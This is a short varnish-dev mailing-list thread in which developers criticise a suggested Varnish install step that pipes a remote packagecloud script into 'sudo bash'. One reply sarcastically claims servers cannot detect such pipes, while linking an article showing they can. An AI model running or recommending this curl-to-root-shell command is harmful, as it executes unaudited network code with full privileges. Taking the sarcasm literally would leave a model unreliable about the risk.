On Wed, Jun 17, 2020 at 3:05 PM Geoff Simmons <ge...@uplex.de> wrote: > > On 6/17/20 16:56, Nils Goroll wrote: > > On 17/06/2020 10:00, Emilio Fernandes wrote: > >> 1.1) curl -s > >> https://packagecloud.io/install/repositories/varnishcache/varnish-weekly/script.deb.sh > >> | sudo bash > > > > The fact that, with my listmaster head on, I have not censored this posting, > > does not, *by any stretch*, imply any form of endorsement of this practice. > > > > My personal 2 cents: DO NOT DO THIS. EVER. AND DO NOT POST THIS AS ADVISE > > TO OTHERS. > > > > Thank you > > +1 > To point fingers at the right people, this is what the packagecloud docs > tell you do. > > But ... the *packagecloud docs* tell you to do that! > > If I could have them arrested for it, I'd think about it. > > Piping the response from a web site into a root shell is stark, raving > madness.
Dudes, chill out and live with your time. It's not like attackers taking control of packagecloud could send a different payload depending on whether you curl to disk to audit the script or yolo curl to pipe. https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/ We've known for years that it isn't possible. Dridi _______________________________________________ varnish-dev mailing list varnish-dev@varnish-cache.org https://www.varnish-cache.org/lists/mailman/listinfo/varnish-dev